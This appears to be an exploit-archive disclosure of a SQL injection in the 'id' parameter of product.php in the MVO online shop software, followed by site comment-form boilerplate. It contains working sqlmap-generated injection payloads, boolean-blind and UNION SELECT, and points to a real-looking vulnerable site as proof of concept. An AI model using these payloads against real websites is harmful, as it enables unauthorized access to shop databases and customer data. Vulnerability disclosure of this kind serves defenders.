MVO Maquina Vendas Online SQL Injection

2014-10-14 / 2017-08-16

Credit: Renzi

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

# SQL Injection on MVO ? - M?quina Vendas Online

# Risk: High

# CWE number: CWE-89

# Date: 13/10/2014

# Vendor: adnweb.es

# Author: Felipe " Renzi " Gabriel

# Contact: renzi@linuxmail.org

# Tested on:  Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906

# Vulnerable File: product.php

# Exploits: http://www.targXet.pt/product.php?id=[SQLI]

# PoC:      http://www.florXes.pt/product.php?id=31

--- "SQLI using SQLMAP."--- 
         
    Place: GET
    Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=31' AND 7612=7612 AND 'AUyP'='AUyP

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: id=31' UNION ALL SELECT CONCAT    (0x7177687471,0x4c526646645746766575,0x717a616f71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

---

# Thank's

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

MVO Maquina Vendas Online SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.